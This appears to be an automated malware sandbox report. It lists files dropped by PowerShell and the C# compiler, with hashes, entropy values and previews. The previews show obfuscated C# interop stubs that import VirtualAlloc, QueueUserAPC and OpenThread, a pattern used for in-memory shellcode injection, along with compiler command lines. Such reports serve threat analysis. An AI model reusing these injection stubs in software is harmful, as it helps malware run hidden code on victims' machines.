              SSDEEP:3:U:U
              MD5:C4CA4238A0B923820DCC509A6F75849B
              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
              Malicious:false
              Reputation:unknown
              Preview:1
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:UTF-8 Unicode (with BOM) text
              Category:dropped
              Size (bytes):408
              Entropy (8bit):5.01293234302818
              Encrypted:false
              SSDEEP:6:V/DsYLDS81zuJAsNiWVMRSRa+eNMjSSRrjEzxevVSRNveKP8nQe3CGy:V/DTLDfuH0Wl9eg5r4NevU1eKPJeyGy
              MD5:35EAB9A45B1CC09A0099A179AD3DCFE5
              SHA1:42939AC7047BC372300FDD21624100E5C9F83B7F
              SHA-256:EEEECB79A83F234A098D4E685F9649E562EE2C5180DA03CE782DF3F95D7EB5A7
              SHA-512:03DB096CD43E298A526507BE3252F718516E26ECB50400D052B9C26E76EB89F950770696F2034FD9031E3421EE5F7E225D985BFD92CC51338EC19854C85017C1
              Malicious:false
              Reputation:unknown
              Preview:.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class sbjqhhwtq. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint cfuaonbeh,uint oaxrtopxx);.[DllImport("kernel32")].public static extern IntPtr VirtualAlloc(IntPtr ckpaa,uint gmprdfblmj,uint nuadeidgng,uint pxgmfdeh);.. }..}.
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
              Category:dropped
              Size (bytes):351
              Entropy (8bit):5.204272802797053
              Encrypted:false
              SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23ftzxs7+AEszIWXp+N23fO9:p37Lvkmb6KH1WZE8w
              MD5:DDCBEEB82FF764447619CA8F26B79AB0
              SHA1:A052431B053ADEAD13B9423EDD80F4FA10449761
              SHA-256:B19AC579456301299E428F81373E8CDEC9B472B46DAB3181DA7036EAFDF344F9
              SHA-512:C45C889F7F9F9A0C13A506A10D9366C986054449F0BF4106E67C6306C1935A91F538672C177A2939A39097DFCC0D2B62225895EAD3D32305932EC613B3A6758C
              Malicious:false
              Reputation:unknown
              Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\oeprcmty.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\oeprcmty.0.cs"
              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):3584
              Entropy (8bit):2.6167731029789754
              Encrypted:false
              SSDEEP:48:69XE7S5FwYXok+xW8JrwZX1ulaIta31Iuq:b7S5ekPte8gK1
              MD5:42FA89466D0BA4E5CE5F3B7D1CE657EF
              SHA1:CF74956879EA24FD0E5E7B83DB67076BC4DB1130
              SHA-256:47B05AD37FFC382C93C1A317459F63F21FF3350792C3A75B41F55302C8B095F9
              SHA-512:43EDD9ACD9592AF0E1CFAA03B912B9396BBEB379F8FEE6036A570B5B8825929A579DAA47666769B7150628B8B511F46483DB337651DB9975D8A6B0FDDEFB3BF2
              Malicious:false
              Reputation:unknown
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....a...........!.................$... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..d.............................................................(....*BSJB............v4.0.30319......l...H...#~......D...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................5.................(.......................!.............. <............ N............ V.....P ......c.........i.....s.....}.....................c. ...c...!.c.%...c.......*.....3.;.....<.......N.......V...........
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
              Category:modified
              Size (bytes):848
              Entropy (8bit):5.303367578429046
              Encrypted:false
              SSDEEP:12:xKIR37Lvkmb6KH1WZE8lKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:AId3ka6KHaE8lKaM5DqBVKVrdFAMBJTH
              MD5:ACC5E905D76EBE06CB3C38D09CB263C1
              SHA1:EEB3AF5D92BA9D427C85C67331B958E0063B4510
              SHA-256:E991673849F98E5A44BA73A54CA47A1C3702F5BC55468B4CEDFE8A294829C473
              SHA-512:09151FBB71982E91F91C4CF2C29057F5719235AC38853B94F48593C3C05B5708BAFB94290FBA65F256668BEB9BB1B6F1DB7EB0EA6B2886A956E3C8ACA5CAFBD1
              Malicious:false
              Reputation:unknown
              Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\oeprcmty.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\oeprcmty.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:UTF-8 Unicode (with BOM) text
              Category:dropped
              Size (bytes):404
              Entropy (8bit):5.019892496194437
              Encrypted:false
              SSDEEP:6:V/DsYLDS81zuJyLHMRSR7a1maLXKqoSRa+rVSSRnA/fQTbIOktwy:V/DTLDfucj3aLXKqj9rV5nA/IT8ORy
              MD5:04CA9F3DD2F71BC69A66232592BD29B7
              SHA1:12724CB97FE30A8B84901648B3653B9AC8FB2F73
              SHA-256:DBC22FFC06EBCB8F7E00BB962CA175EFFBBDF0DEBE7A2E4D288A8735C5C27DB1
              SHA-512:383C82A91A354A95E9887E9731852788F466C461EA58A016532E4B07A3E19A97C525B4B579B86A4681BF3DBACFA6B65C8F11032B904737C287A6A5498E4EEB4E
              Malicious:false
              Reputation:unknown
              Preview:.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class mdmvexpd. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr uqmdvtabd,IntPtr kdclqxwfug,IntPtr vtnts);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint cxsij,uint lhaikp,IntPtr xwl);.. }..}.
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
              Category:dropped
              Size (bytes):351
              Entropy (8bit):5.302656177771041
              Encrypted:false
              SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23fRGWzGzxs7+AEszIWXp+N23fRGWzb:p37Lvkmb6KHpGWZE8pb
              MD5:CBF10C1AA567D2B82E5C422E0E544DBC
              SHA1:C6E081F904BEC73A1335B50C820B8FC00B26142C
              SHA-256:5024F757714C7A4D6EC2DBADB6F5636ABAC0969348C2865AF68CD70538C94EAF
              SHA-512:519ACB5318CA598DA74DE737FA0F97C85A1EA1BB3883C064DD5EC9DE083C8802720E17712F03AFDA3091B670C73A10CE95388F644E69EA991718405ECCF11E8D
              Malicious:false
              Reputation:unknown
              Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\oyq1c2cj.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\oyq1c2cj.0.cs"
              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):3584
              Entropy (8bit):2.627023820532716
              Encrypted:false
              SSDEEP:24:etGS/8OmU0t3lm85nt4tdalqQg6AyS41lI+tkZfUBFyVUWI+ycuZhN4rakSBEPNq:6dXQ3r5eXa1OxJUPy31ulaa3Oq
              MD5:FE9CF2A1075CDE78F99497A0ABFD05F1
              SHA1:E2344F061295060CC6811ECB494E2E28087A9FEF
              SHA-256:E4D23FD1D1461CF5C63B24A22D23022117A15B0B7B67245FE3D62BA7B6E0E5B3
              SHA-512:57C8A774CB7815770F9DD1432C92C9F3AC9187E44CA1EBF20CAE98E9065365F475362296561576ADBB330356B1CA0E3BEA198E84F9DE4BD2836502151E79B4BD
              Malicious:false
              Reputation:unknown
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....a...........!.................$... ...@....... ....................................@..................................#..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..\.............................................................(....*BSJB............v4.0.30319......l...H...#~......<...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................4.-....................................... .............. ;............ H............ [.....P ......f.........l.....v...........................f. ...f...!.f.%...f.......*.....3.1.....;.......H.......[...........
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
              Category:modified
              Size (bytes):848
              Entropy (8bit):5.348978461572798
              Encrypted:false
              SSDEEP:12:xKIR37Lvkmb6KHpGWZE8paKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:AId3ka6KHNE88KaM5DqBVKVrdFAMBJTH
              MD5:877DECC09667FEEF592E3D12599D6BE6
              SHA1:38E9B510CEDFD51647B8E60E108ABD9D5B88A872
              SHA-256:D4C965D7B55B61D2E9C2DA9832B765CB6DAB82C25161840C8BC40B1021182DD3
              SHA-512:E789EE736C5D700F327695C04DBDCD55CDFA5DCD66CFDF6721AECA281019C3B9BC79203128CDCECF8B7ACD1806F395E22D18E4ACE0C510D33ABAFC8E5B2DABA6
              Malicious:false
              Reputation:unknown
              Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\oyq1c2cj.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\oyq1c2cj.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:UTF-8 Unicode (with BOM) text
              Category:dropped
              Size (bytes):408
              Entropy (8bit):5.01293234302818
              Encrypted:false
              SSDEEP:6:V/DsYLDS81zuJAsNiWVMRSRa+eNMjSSRrjEzxevVSRNveKP8nQe3CGy:V/DTLDfuH0Wl9eg5r4NevU1eKPJeyGy
              MD5:35EAB9A45B1CC09A0099A179AD3DCFE5
              SHA1:42939AC7047BC372300FDD21624100E5C9F83B7F
              SHA-256:EEEECB79A83F234A098D4E685F9649E562EE2C5180DA03CE782DF3F95D7EB5A7
              SHA-512:03DB096CD43E298A526507BE3252F718516E26ECB50400D052B9C26E76EB89F950770696F2034FD9031E3421EE5F7E225D985BFD92CC51338EC19854C85017C1
              Malicious:false
              Reputation:unknown
              Preview:.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class sbjqhhwtq. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint cfuaonbeh,uint oaxrtopxx);.[DllImport("kernel32")].public static extern IntPtr VirtualAlloc(IntPtr ckpaa,uint gmprdfblmj,uint nuadeidgng,uint pxgmfdeh);.. }..}.
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
              Category:dropped
              Size (bytes):351
              Entropy (8bit):5.268763390388562
              Encrypted:false
              SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23fb0zxs7+AEszIWXp+N23fVH:p37Lvkmb6KHoWZE89H
              MD5:0AED35FFAB0A5CA771393CEE60A13F73
              SHA1:979C1895FA3CBA52E97A565456E3CB7BC5F2881C
              SHA-256:BBC0244212BE2929C78131DC34E9FD9A02073ACC1E8E168234983639565942B1
              SHA-512:E404EE19D23A043A1F920E8EFA6ACDB3BED35DA1FB4F04FAE4671CB09DA372ED730475AD757C02495A440796EA36CCB520CE92DC4E509CD235FCEFD326FBF7E5
              Malicious:false
              Reputation:unknown
              Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\pqvogmwc.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\pqvogmwc.0.cs"
              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):3584
              Entropy (8bit):2.6261368502649796
              Encrypted:false
              SSDEEP:48:6foXE7S5FwYXok+fOW8J4bZX1ulia3Gq:4z7S5ekE7ZeUK
              MD5:ABDFB9F235DA3F5765DF16A0F4C505C5
              SHA1:5AC9B90DB8481105FE57EF9D8034C8107BBCD4FB
              SHA-256:6E6742E39EB933CD0FFB0FB7A180BD24CFFD36A3DBF4DEE8860C701374EE2C65
              SHA-512:A1B1BCF89FF334AD8FC7D71AF2E89D58725323CE7CFE78C79D594FE7A0CF74F79309EB43A2BEB15E34BE19999595394B3A9C6F74746994A09B144518A1D7B17B
              Malicious:false
              Reputation:unknown
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....a...........!.................$... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..d.............................................................(....*BSJB............v4.0.30319......l...H...#~......D...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................5.................(.......................!.............. <............ N............ V.....P ......c.........i.....s.....}.....................c. ...c...!.c.%...c.......*.....3.;.....<.......N.......V...........
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
              Category:modified
              Size (bytes):848
              Entropy (8bit):5.327041989163472
              Encrypted:false
              SSDEEP:12:xKIR37Lvkmb6KHoWZE89OKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:AId3ka6KH5E8AKaM5DqBVKVrdFAMBJTH
              MD5:F180A3304C942DDE94B3BAC538ECB758
              SHA1:6E79051C6651F1BD7FFD6FACFCD2593FADA77211
              SHA-256:6F3C8189552C2FD69069D7310004463AA064222D955826CE28204DFC65B676B8
              SHA-512:3E15E72859E72FF31C2BAF5CE595307A5B541286CE3F49EE6733CB29DDF4753D25DAB1DC80D1F5DB983FCB39B730687F79DBFE9A6308EE4E3E0BE717295608C4
              Malicious:false
              Reputation:unknown
              Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\pqvogmwc.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\pqvogmwc.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:UTF-8 Unicode (with BOM) text
              Category:dropped
              Size (bytes):408
              Entropy (8bit):5.01293234302818
              Encrypted:false
              SSDEEP:6:V/DsYLDS81zuJAsNiWVMRSRa+eNMjSSRrjEzxevVSRNveKP8nQe3CGy:V/DTLDfuH0Wl9eg5r4NevU1eKPJeyGy
              MD5:35EAB9A45B1CC09A0099A179AD3DCFE5
              SHA1:42939AC7047BC372300FDD21624100E5C9F83B7F
              SHA-256:EEEECB79A83F234A098D4E685F9649E562EE2C5180DA03CE782DF3F95D7EB5A7
              SHA-512:03DB096CD43E298A526507BE3252F718516E26ECB50400D052B9C26E76EB89F950770696F2034FD9031E3421EE5F7E225D985BFD92CC51338EC19854C85017C1
              Malicious:false
              Reputation:unknown
              Preview:.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class sbjqhhwtq. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint cfuaonbeh,uint oaxrtopxx);.[DllImport("kernel32")].public static extern IntPtr VirtualAlloc(IntPtr ckpaa,uint gmprdfblmj,uint nuadeidgng,uint pxgmfdeh);.. }..}.
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
              Category:dropped
              Size (bytes):351
              Entropy (8bit):5.278277088352822
              Encrypted:false
              SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23faW+zxs7+AEszIWXp+N23faMn:p37Lvkmb6KHf+WZE87n
              MD5:5790AEB5F74FB21A80B408FD12A92956
              SHA1:24CD53B4B919829C1B8759DE70332D6C33833B08
              SHA-256:AB497F850922DCAA447D61C6DB10B7C506185F853C4A83B57AB6F64FB3AFF3C3
              SHA-512:DECC8E44B896BC7939FD86BCB4FDA8A8C33D04C24F3A50AA226EB305A7720D71B0205E0711C92CC54C63995D5CC907EB6B56F8C2D91FA66747687854F824C0D2
              Malicious:false
              Reputation:unknown
              Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\pwlcj2cu.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\pwlcj2cu.0.cs"
              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):3584
              Entropy (8bit):2.629201724166271
              Encrypted:false
              SSDEEP:24:etGSt8+mUE7R85FwYH3okOp3fOdWOjU9tkZfpMGqZ0WI+ycuZhNaakSCPNnq:6jXE7S5FwYXok+wW8JqXZX1ulaa3Oq
              MD5:5B6BFEE2D96A3F071B7CDB664124FA24
              SHA1:9CC97AF3855302E9AF7A5CB867C25E63E125777C
              SHA-256:A955C358D2C8C39435A3C5F58EAA07D1E33CFDA61C4FC0A861F2EA2579B7EA9C
              SHA-512:0DC30DCC0F81EFFBBC7C25B0E74DCC040E9E162B293AD12C7E5209CF71A2352094E2DAC942A45F9B391D2B43F6AC91F6D34E8AA2B0E0F2E23AABF1EF5112B88E
              Malicious:false
              Reputation:unknown
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....a...........!.................$... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..d.............................................................(....*BSJB............v4.0.30319......l...H...#~......D...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................5.................(.......................!.............. <............ N............ V.....P ......c.........i.....s.....}.....................c. ...c...!.c.%...c.......*.....3.;.....<.......N.......V...........
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
              Category:modified
              Size (bytes):848
              Entropy (8bit):5.334266323622075
              Encrypted:false
              SSDEEP:12:xKIR37Lvkmb6KHf+WZE87uKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:AId3ka6KH3E86KaM5DqBVKVrdFAMBJTH
              MD5:693350EB45B076BEF7BADC2A56D51D9A
              SHA1:166691AB2DB7AD9CC5D4EEA53978B3449EA2CD1F
              SHA-256:AA4A99224C20E8013A706290E2E528CEAC862D6831BB55505FCBBBEB269D56A8
              SHA-512:0D465EADD34EB3D465CAFAC084DA43F54B7DAE86A7B5236E7BB032689F9C7F8C9AD6D98D7F95A4279D7F47D41E385EB8EAE99753D0646FAF77031BD0BDFCEA4D
              Malicious:false
              Reputation:unknown
              Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\pwlcj2cu.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\pwlcj2cu.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:UTF-8 Unicode (with BOM) text
              Category:dropped
              Size (bytes):404
              Entropy (8bit):5.019892496194437
              Encrypted:false
              SSDEEP:6:V/DsYLDS81zuJyLHMRSR7a1maLXKqoSRa+rVSSRnA/fQTbIOktwy:V/DTLDfucj3aLXKqj9rV5nA/IT8ORy
              MD5:04CA9F3DD2F71BC69A66232592BD29B7
              SHA1:12724CB97FE30A8B84901648B3653B9AC8FB2F73
              SHA-256:DBC22FFC06EBCB8F7E00BB962CA175EFFBBDF0DEBE7A2E4D288A8735C5C27DB1
              SHA-512:383C82A91A354A95E9887E9731852788F466C461EA58A016532E4B07A3E19A97C525B4B579B86A4681BF3DBACFA6B65C8F11032B904737C287A6A5498E4EEB4E
              Malicious:false
              Reputation:unknown
              Preview:.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class mdmvexpd. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr uqmdvtabd,IntPtr kdclqxwfug,IntPtr vtnts);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint cxsij,uint lhaikp,IntPtr xwl);.. }..}.
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
              Category:dropped
              Size (bytes):351
              Entropy (8bit):5.277721811228957
              Encrypted:false
              SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23fRP1HUzxs7+AEszIWXp+N23fRPdxn:p37Lvkmb6KHfUWZE8Z
              MD5:0A524C50986168EBADFA5220C99D85B5
              SHA1:957C8AE7E56ED3E31C52C620CA58A536AF663B1E
              SHA-256:6A81B937A0148A536367B397563C15616B7CFCC944B0AD7301E5C772877ED3C8
              SHA-512:2AC9AB5498FCD94B6CD22DE78EBEE49487F729DDAF467B68A4070BD22725B02F58C2C6571783BE8175591F22227FAACE82B57B882E9059E0D103B8E9A3553E54
              Malicious:false
              Reputation:unknown
              Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\sjfy431f.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\sjfy431f.0.cs"
              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):3584
              Entropy (8bit):2.624456178337711
              Encrypted:false
              SSDEEP:24:etGSF8OmU0t3lm85nt4tdalqQg6AxoS41lI+tkZfAB8WVUWI+ycuZhNSakSaPNnq:6rXQ3r5eXa1mLxJAuG31ulSa3Wq
              MD5:177880A67897413DB394031830AD03DC
              SHA1:3603A0870B5664FA8883FBEB92CE3C1FD692630B
              SHA-256:DB91BB6E6CE210D265DF94791A01837D9D946BA57CCE88807AF9F949BCC77948
              SHA-512:D521BDBAC1A2575C6B5CFBE8D48B4991C37A2FBE5295F6187E906C5264747D0949331D4F1DC71D1C62FA5F78AD4CB58C71D62240A3A6B4CE8394376AF308EA15
              Malicious:false
              Reputation:unknown
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....a...........!.................$... ...@....... ....................................@..................................#..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..\.............................................................(....*BSJB............v4.0.30319......l...H...#~......<...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................4.-....................................... .............. ;............ H............ [.....P ......f.........l.....v...........................f. ...f...!.f.%...f.......*.....3.1.....;.......H.......[...........
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
              Category:modified
              Size (bytes):848
              Entropy (8bit):5.3386347893313015
              Encrypted:false
              SSDEEP:24:AId3ka6KHf1E8cKaM5DqBVKVrdFAMBJTH:Akka6Af1E8cKxDcVKdBJj
              MD5:67EB5E2F017A649CC23A1087ADE069B1
              SHA1:1DF9C625CB803F220A526CBA638E49333090188B
              SHA-256:BA084FDF251C7820AF14F6C4BA6327476CD3093FDA26E9A30936C96F228E8442
              SHA-512:518C660F89C42027E9A3E61F396A9FC74B11C77F653EC04054F7103C0EE9C9E00526F33D982080EA8D7B9FF6A39598DF47FAB2C49CD53A33E14CFA3FCF6A9CB3
              Malicious:false
              Reputation:unknown
              Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\sjfy431f.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\sjfy431f.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:UTF-8 Unicode (with BOM) text
              Category:dropped
              Size (bytes):404
              Entropy (8bit):5.019892496194437
              Encrypted:false
              SSDEEP:6:V/DsYLDS81zuJyLHMRSR7a1maLXKqoSRa+rVSSRnA/fQTbIOktwy:V/DTLDfucj3aLXKqj9rV5nA/IT8ORy
              MD5:04CA9F3DD2F71BC69A66232592BD29B7
              SHA1:12724CB97FE30A8B84901648B3653B9AC8FB2F73
              SHA-256:DBC22FFC06EBCB8F7E00BB962CA175EFFBBDF0DEBE7A2E4D288A8735C5C27DB1
              SHA-512:383C82A91A354A95E9887E9731852788F466C461EA58A016532E4B07A3E19A97C525B4B579B86A4681BF3DBACFA6B65C8F11032B904737C287A6A5498E4EEB4E
              Malicious:false
              Reputation:unknown
              Preview:.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class mdmvexpd. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr uqmdvtabd,IntPtr kdclqxwfug,IntPtr vtnts);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint cxsij,uint lhaikp,IntPtr xwl);.. }..}.
              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
              Category:dropped
              Size (bytes):351
